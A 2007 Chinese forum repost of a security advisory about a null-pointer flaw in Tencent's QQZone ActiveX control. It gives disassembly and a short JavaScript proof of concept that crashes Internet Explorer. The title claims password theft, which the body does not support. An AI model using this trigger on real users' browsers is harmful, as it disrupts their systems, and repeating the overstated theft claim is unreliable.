投票
标题:QQ又出新的漏洞 涉及所有版本 可以盗取密码
inf
欢喜的慈雨
Rank: 5Rank: 5Rank: 5Rank: 5Rank: 5



UID 11285
精华 1
积分 1759
帖子 1239
狼毛 87 根
阅读权限 40
注册 2006-1-19
状态 离线
发表于 2007-2-14 08:48 资料 短消息  加为好友 
QQ又出新的漏洞 涉及所有版本 可以盗取密码

转cnbeta
http://www.cnbeta.com/modules.php?name=News&file=article&mode=flat&sid=22493

幻影旅团的axis发现了一个QQZone的activex漏洞.在使用WebCtrl.
方法时,将引用一个空指针,造成ie崩溃.由于该activex没有标记为safe,故会出现安全提示.

细节:

在TencentQQQZoneTWebCtrl.dll中,使用Navigate方法时,将造成一个空指针引用

051024C0 8B4424 04 MOV EAX,DWORD PTR SS:[ESP+4]
051024C4 8B5424 08 MOV EDX,DWORD PTR SS:[ESP+8]
051024C8 6A 00 PUSH 0
051024CA 6A 00 PUSH 0
051024CC 8B80 B8000000 MOV EAX,DWORD PTR DS:[EAX+B8]
051024D2 6A 00 PUSH 0
051024D4 6A 00 PUSH 0
051024D6 52 PUSH EDX
051024D7 8B08 MOV ECX,DWORD PTR DS:[EAX]

此时EAX为null

幻影旅团将对此发布一个POC代码,请勿将此作为非法用途

POC:
>
var qqkcuf = new ActiveXObject("WebCtrl.TWebControl.1");
var arg1 = 0;

qqkcuf.Navigate(arg1);

建议:

禁止ie执行activex

厂商补丁:
目前厂商没有发布补丁

 顶部
爱铃儿
该用户已被删除









发表于 2007-2-14 10:48 
*** 作者被禁止或删除 内容自动屏蔽 ***
 



当前时区 GMT+8, 现在时间是 2024-11-24 10:45
苏ICP备2024131517号

Powered by Discuz! 5.5.0 © 2001-2007
Processed in 0.011322 second(s), 10 queries, Gzip enabled

清除 Cookies - 联系我们 - 狼窝 - Archiver - WAP